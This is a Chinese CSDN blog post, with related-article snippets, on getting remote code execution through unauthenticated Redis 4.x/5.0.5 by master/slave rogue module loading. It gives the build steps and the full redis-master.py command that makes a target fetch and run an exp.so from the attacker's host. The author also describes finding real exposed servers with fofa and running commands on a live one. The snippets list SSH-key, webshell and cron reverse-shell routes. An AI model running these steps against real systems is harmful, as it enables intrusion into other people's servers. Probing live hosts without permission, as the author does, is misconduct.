Redis 4.x/5.0.5以前未授权访问rce

最新推荐文章于 2024-08-05 21:22:29 发布
最新推荐文章于 2024-08-05 21:22:29 发布
阅读量846 收藏
点赞数 1
分类专栏: web渗透 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42967398/article/details/111599250
版权

Redis 4.x/5.0.5以前未授权访问rce

关于redis未授权访问漏洞,网上已经有一大堆的利用方式了,
默认端口:6379,未授权密码一般为空,也有可能存在弱口令
未授权访问利用方式基本分为三种~~
第一种:ssh免密登录

  • 需要开启ssh服务
  • 需要/root/.ssh或其他.ssh能写入

第二种:直接写入webshell

  • 开启web服务
  • 需要知道网站绝对路径
  • 具有对文件操作的权限

第三种:定时任务反弹shell

  • 需要root权限
  • 知道定时计划的路径,如/var/spool/cron

用fofa搜了一波,其实是存在很多redis未授权的:
在这里插入图片描述
直接使用redis-cli -h x.x.x.x即可连接进入,输入info:
在这里插入图片描述
真实环境,连接看看就行,,,,,
回到正题:Redis 4.x/5.0.5以前未授权访问rce漏洞
原理:Redis未授权访问在4.x/5.0.5以前版本下,我们可以使用master/slave模式加载远程模块,通过动态链接库的方式执行任意命令。
利用脚本:https://github.com/vulhub/redis-rogue-getshell
使用之前需要编译一下生成exp.so:

cd RedisModulesSDK/
make

之后便可执行脚本:

python3 redis-master.py -r target-ip -p 6379 -L local-ip -P 8888 -f RedisModulesSDK/exp.so -c "whoami"

这里利用fofa找到一个版本相符合的(版本符合也不一定能执行命令),版本4.0.11:
在这里插入图片描述
运行脚本,可以得到命令执行的结果:
在这里插入图片描述
真实环境,点到为止~~
有啥描述得不对的地方,欢迎各位大佬指出~~

A_dmins
关注
专栏目录
9-5 redis授权访问漏洞
weixin_43263566的博客
11-17 539
攻击者可以成功将自己的SSH公钥写入目标服务器的/root/.ssh文件夹中的authorized_keys文件,从而可以使用相应私钥直接登录目标服务器。在Redis 4.x/5.x以前的版本中,授权访问还可以利用master/slave模式加载远程模块,并通过动态链接库的方式执行任意命令。配置公钥认证:攻击者将公钥配置到Redis服务器上,可能是通过利用已经获得的其他权限,或者通过攻击Redis服务器的漏洞进行授权访问并添加公钥。高版本的Redis通常会修复已知的漏洞,并提供更强大的安全性能。
二十八种授权访问漏洞合集(暂时最全)
墨痕诉清风的博客
01-04 4837
目录 0x01 授权漏洞预览 0x02 Active MQ 授权访问 0x03 Atlassian Crowd 授权访问 0x04 CouchDB 授权访问 0x05 Docker 授权访问 0x06 Dubbo 授权访问 0x07 Druid 授权访问 0x08 Elasticsearch 授权访问 0x09 FTP 授权访问 0x10 HadoopYARN 授权访问 0x11 JBoss 授权访问 0x12 Jenkins 授权访问 0x13 Jupyt
Redis-主从复制
shui2104的博客
09-27 261
Redis-主从复制 ​ 为了避免单点Redis服务器故障,准备多台服务器,相互连通。将数据多个副本保存在不同的服务器上,连接在一起,并保证数据是同步的。即使其中某一台服务器宕机,其他服务器依然可以继续提供服务,实现Redis的高可用,同时实现数据冗余备份。 ​ 主从复制即将master中的数据有效及时的复制到slave中。一个master可以对应多个slave,一个slave只能对应一个master。 master:复制写数据,执行写操作时,将出现变化的数据自动同步到slave。读数据的操作基本可忽略
Redis授权访问
npc88888的博客
05-09 2225
在 Reids 4.x 之后,Redis新增了模块功能,通过外部拓展,可以实现在redis中实 现一个新的Redis命令,通过c语言编译并加载恶意.so文件,达到代码执行的目的。更改目标服务器Redis备份路径为ssh公钥存放目录(一般默认为/root/.ssh):config set dir /root/.ssh。原文链接:https://blog.csdn.net/weixin_45605352/article/details/118790775。进入/root/.ssh目录: 将生成的公钥保存到。
授权访问漏洞复现~~~】
最新发布
m0_59151303的博客
08-05 1607
步骤二:可使用Nmap扫描该端口是否开启服务,还可以使用Metasploit中关于允许匿名访问的rsync扫描模块进行探测…步骤二:如果存在授权访问漏洞则直接访问 http://IP:8888会直接跳到web管理界面,不需要输入密码。步骤二:ActiveMQ默认使用8161端口,默认用户名和密码是 admin/admin,在打开的页面输入…步骤二:在打开的URL中…步骤一:使用以下Fofa语法搜索使用Idap服务的产品.…步骤一:在 fofa 中搜索该资产语法如下并在Vulhub中开启靶场!
数据库安全-Redis授权&Hadoop&Mysql&授权访问&RCE 漏洞复现
rumil的博客
10-13 1449
授权访问漏洞可以理解为需要安全配置或权限认证的地址、授权页面存在缺陷导致其他用户可以直接访问从而引发重要权限可被操作、数据库或网站目录等敏感信息泄露,包括端口的授权常见页面的授权 /admin.php /menu.php常见的授权访问漏洞及默认端口:默认端口统计:8095, 8161, 9100, 9200, 9300, 11211, 15672, 15692, 20048, 25672, 27017]等待。
Redis 4.x RCE 复现学习
weixin_30376453的博客
07-28 232
攻击场景: 能够访问远程redis的端口(直接访问或者SSRF) 对redis服务器可以访问到的另一台服务器有控制权 实际上就是通过主从特性来 同步传输数据,同时利用模块加载来加载恶意的用来进行命令执行的函数,从而进行rce redis之前的攻击方法有 1.写shell CONFIG SET dir /VAR/WWW/HTML CONFIG SET dbfile...
Redis 4.x5.x 授权访问漏洞(RCE
网络安全。
02-14 1433
0x01 简介 Redis授权访问在4.x/5.0.5以前版本下,我们可以使用master/slave模式加载远程模块,通过动态链接库的方式执行任意命令。 0x02 漏洞复现 1、环境启动后,通过redis-cli -h your-ip即可进行连接,可见存在授权访问漏洞。 2、使用如下POC即可直接执行命令。 工具地址:https://github.com/vulhub/redis-rogu...
渗透测试-Redis授权访问漏洞利用
cdyunaq的博客
12-24 1201
危害 信息泄露 系统信息 redis保存的信息 写文件GetShell 在Web目录中写入webshell 写入SSH公钥直接连接 写入计划任务(corntab)反弹shell 高级利用 主从复制getshell(4.x version < 5.0.5) 模块加载执行命令(> 4.x) 环境准备 机型 ip 服务 版本 攻击机
Redis授权访问漏洞引出的漏洞利用方式
Chu_Jian_Xiong的博客
11-20 1370
redis授权访问漏洞是一个由于redis服务版本较低其设置登录密码导致的漏洞,攻击者可直接利用redis服务器的ip地址和端口完成redis服务器的远程登录,对目标服务器完成后续的控制和利用。
Redis系列漏洞总结
极光时流
10-06 6038
Redis系列漏洞总结 文章目录Redis系列漏洞总结环境:ubuntu16.04,redis5.0.1redis下载及安装redis 漏洞利用方式0x01 绝对路径写shell0x02 redis 写入ssh公钥0x03 Redis主从复制getshellredis 主从结合ssrf0x04redis利用crontab定时任务反弹getshell(此方式只针对centos服务器) 环境:ubuntu16.04,redis5.0.1 redis下载及安装 下载 wget http://download.
redis4.0x5.0x-远程命令漏洞利用exp.rar
07-09
redis4.0x5.0x-远程命令漏洞利用exp 2019年7月9日版,仅用来学习测试,不可用于非法用途,谢谢配合,实测可用
redis主从rceredis5.0版本下rce的不同
五分之一世纪
08-08 533
文章目录(1)redis遵循的两种脚本协议【1】明文(plaintext)【2】序列化(custom)【3】分析(2)实现rce的方法【1】不持久的RCE【2】一般情况下的持久的RCE【3】5.0版本下持久的RCE 学习redis主从漏洞你一定要知道的知识点 (1)redis遵循的两种脚本协议 【1】明文(plaintext) example: SET keyname value\n 【2】序列化(custom) example: *3\r\n$3\r\nSET\r\n$7\r\nkeyname\r\n$5
漏洞复现之Redis授权访问
m0_56190544的博客
09-13 2666
本文详细介绍了redis授权访问漏洞的原理以及利用方法,供大家参考学习
Redis基于主从复制的RCE 4.x/5.x 复现
weixin_30408165的博客
07-12 444
0x00 前言 最近期末考试,博客好久没有更新了,这段时间爆了三四个洞,趁着还没去实习,抓紧复现一下,这次复现的是RedisRCE,复现过程中也遇到很多问题,记录下来和大家分享一下 0x01 拉取镜像 docker确实是个好东西,有了它复现节省不少时间,首先拉取一个5.0镜像 docker search redis5.0 //查找镜像docker pull damonev...
Redis基于主从复制的RCE(redis4.x 5.x)复现
ddr12231的博客
07-10 274
使用docker建立redis 拉取镜像 运行 查看 可以连接,存在授权 https://github.com/Ridter/redis-rce 发送poc i:正向连接 r:反弹 反弹成功 转载于:https://www.cnblogs.com/mrhonest/p/11162735.html...
Redis授权漏洞利用
tangshuangsss的专栏
01-04 648
点击"仙网攻城狮”关注我们哦~不当想研发的渗透人不是好运维让我们每天进步一点点简介redis是一个key-value存储系统。和Memcached类似,它支持存储的value类型相对更多,...
Redis授权访问漏洞复现及利用
Lilin's博客
03-20 999
Redis授权访问漏洞复现及利用Redis相关介绍应用场景常用语法漏洞复现环境搭建Centos 7 环境配置安装Apache安装PHP安装Redis漏洞利用准备kali安装Rediswindows安装Redis授权访问漏洞利用webshell反弹shell写公钥主从复制RCE预防措施其他问题 Redis相关介绍 Redis是完全开源的,遵守BSD协议,是一个高性能的key-value数据库。 应用场景 在Java web中主要有两个应用场景: 存储、缓存用的数据 需要高速读写的场合使用它快速读写 常
Redis 4.x/5.x授权访问漏洞(以及一些环境搭建的坑)(7月18更新)
来到了学渣的博客
05-01 1664
Redis是什么? Redis是数据库,一个高性能的key-value存储系统,是使用ANSI C语言编写的。 Redis授权访问漏洞 Redis 默认情况下,会绑定在 0.0.0.0:6379,如果没有进行采用相关的策略,比如添加防火墙规则避免其他非信任来源 ip 访问等,这样将会将 Redis 服务暴露到公网上,如果在没有设置密码认证(一般为空)的情况下,会导致任意用户在可以访问目标服务器的...
给这段配置文件添加注释services: ruoyi-redis: container_name: ruoyi-redis image: redis build: context: ./redis ports: - "9063:6379" volumes: - ./redis/conf/redis.conf:/home/ruoyi/redis/redis.conf - ./redis/data:/data command: redis-server /home/ruoyi/redis/redis.conf
06-09
以下是带注释的配置文件: ``` services: # Redis服务 ruoyi-redis: # 容器名称 container_name: ruoyi-redis image: redis # Redis镜像 build: # 构建Redis镜像 context: ./redis # Dockerfile所在目录 ports: - "9063:6379" # 容器与主机端口映射 volumes: - ./redis/conf/redis.conf:/home/ruoyi/redis/redis.conf # Redis配置文件映射 - ./redis/data:/data # Redis数据目录映射 command: redis-server /home/ruoyi/redis/redis.conf # 启动Redis服务的命令 ``` 注释解释如下: - Redis服务:这是一个Redis服务容器。 - 容器名称:指定容器的名称为ruoyi-redis。 - Redis镜像:使用Redis官方镜像。 - 构建Redis镜像:使用./redis目录下的Dockerfile构建Redis镜像。 - 容器与主机端口映射:将容器内部的6379端口映射到主机的9063端口。 - Redis配置文件映射:将主机中的./redis/conf/redis.conf文件映射到容器中的/home/ruoyi/redis/redis.conf文件。 - Redis数据目录映射:将主机中的./redis/data目录映射到容器中的/data目录。 - 启动Redis服务的命令:在容器启动时执行redis-server /home/ruoyi/redis/redis.conf命令来启动Redis服务。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值